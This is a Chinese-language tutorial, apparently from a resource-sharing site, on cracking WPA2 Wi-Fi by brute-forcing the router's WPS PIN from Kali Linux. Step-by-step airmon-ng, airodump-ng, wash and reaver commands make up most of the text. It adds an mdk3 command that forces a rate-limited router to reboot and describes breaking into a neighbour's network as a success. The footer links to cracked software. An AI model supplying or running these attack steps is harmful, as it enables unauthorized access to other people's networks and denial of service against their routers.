kali入侵Wifi拿下路由器教程

教程如下:

WPA2-PSK加密原理

现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10 ^8种)。所以我们可以进行简单粗暴的穷举 PIN 码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。

操作步骤

1.切换无线网卡到监听模式

airmon-ng start wlan0

2刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到)

airodump-ng wlan0mon

kali入侵Wifi拿下路由器教程

3.找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址)

wash -i wlan0mon

kali入侵Wifi拿下路由器教程

4.开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v)

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明:

-i 无线网卡名称

-b 目标AP的mac地址

-a 自动检测目标AP最佳配置

-S 使用最小的DH key,可以提高破解速度

-vv 显示更多的非严重警告(注意这是 2 个小写字母 v)

-d 即delay每穷举一次的闲置时间 预设为1秒

-c 信道编号

-p PIN码四位或八位 //可以用8位直接找到密码。

破解时推荐使用这个命令:reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因为–d9 –t9参数可以防止pin死路由器。

kali入侵Wifi拿下路由器教程

5.等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,隔壁妹子没有网络安全意识,密码很脆弱,只用了几分钟便破解了),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息

kali入侵Wifi拿下路由器教程

6.破解成功

kali入侵Wifi拿下路由器教程

7.成功联网

kali入侵Wifi拿下路由器教程

kali入侵Wifi拿下路由器教程

8.拿下路由器

kali入侵Wifi拿下路由器教程

注意事项

如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。

© 版权声明
THE END
喜欢就支持一下吧
点赞12
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

    暂无评论内容

随即推荐
最新Like Girl v5.2.1 情侣小站开源版-铁虎资源网

最新Like Girl v5.2.1 情侣小站开源版

更新内容: 1.在页面右下角增设悬浮功能按钮,集成“返回顶部”与“返回首页”快捷操作,提升用户页面导航与跳转体验。 2.优化留言板界面,修复QQ头像显示功能及IP地址获取机制,同步对UI进行视...
test9405188的头像-铁虎资源网test940518813小时前
0238
小红书图片和视频下载工具输入小红书即可-铁虎资源网

小红书图片和视频下载工具输入小红书即可

今天新开发的小红书图片和视频下载工具。输入小红书链接和cookie就行了。
asmr666的头像-铁虎资源网asmr66619天前
0498
叁叁老师小红书营销爆粉变现课 深入解读-铁虎资源网

叁叁老师小红书营销爆粉变现课 深入解读

01_第一章·第一节_小红书及其商业价值解读.mp4
Prostokva__whol的头像-铁虎资源网Prostokva__whol24天前
0378
美图秀秀APP(P图软件)v11.17.1去广告破解版-铁虎资源网

美图秀秀APP(P图软件)v11.17.1去广告破解版

美图秀秀app是一款美颜滤镜相机及图片美化软件的拍照神器,美图秀秀安卓版是在线P图软件拼图抠图及证件照制作软件修图软件,美图秀秀app破解版提供图片美化工具,人像美容,添加文字,抠图软件,拼图,...
test1439304的头像-铁虎资源网test14393049天前
03014
大脸陈自学秘籍只教真东西-铁虎资源网

大脸陈自学秘籍只教真东西

聚焦实用技能硬核干货,不讲空话,只拆可落地的方法。从问题拆解、资源筛选到高效执行,用亲身经验教你避开自学坑,掌握快速吸收知识的底层逻辑。搭配实战验证过的技巧,让你花更少时间,学到真...
zxy2023的头像-铁虎资源网zxy202313天前
0428
AI与大模型企业应用系列课程-铁虎资源网

AI与大模型企业应用系列课程

一共25个AI与大模型在制造业企业、金融机构、教育机构、餐饮等行业实际上的企业端应用案例,对案例本事做了介绍,并深度讲解了企业选择AI与大模跟业务融合的逻辑,期望能给你带来启发。
别偷我白米饭的头像-铁虎资源网别偷我白米饭27天前
02811
Thinkphp中英文伪静态企业网站完整源码-铁虎资源网

Thinkphp中英文伪静态企业网站完整源码

ThinkPHP是基于PHP的轻量级开发框架,它提供了丰富的内置组件和便捷的MVC模式,使得开发者能够快速构建应用程序。其主要特点包括:
Garmcrypto7intab的头像-铁虎资源网Garmcrypto7intab4天前
03315
游戏代练工作室代练报价单页模板-铁虎资源网

游戏代练工作室代练报价单页模板

轻量高效,快速上线 代码精简:去除冗余动画和复杂特效,保留核心交互,加载速度提升 40%,适合各类服务器配置一般的网站 结构清晰:HTML 代码按 “导航 – 英雄区 – 核心模块 – 联系区” 分...
ErnestoROM的头像-铁虎资源网ErnestoROM10天前
03514
Uninstall Tool 3.8.0软件卸载工具中文破解版-铁虎资源网

Uninstall Tool 3.8.0软件卸载工具中文破解版

Uninstall Tool中文版是一款专业的软件卸载工具.UninstallTool最新版比系统自带的'添加/删除程序'功能卸载速度快3倍.它可移除系统自带程序功能所不能删除的程序,使用强制删除可卸载注册表相关项...
RandallLug的头像-铁虎资源网RandallLug17天前
0457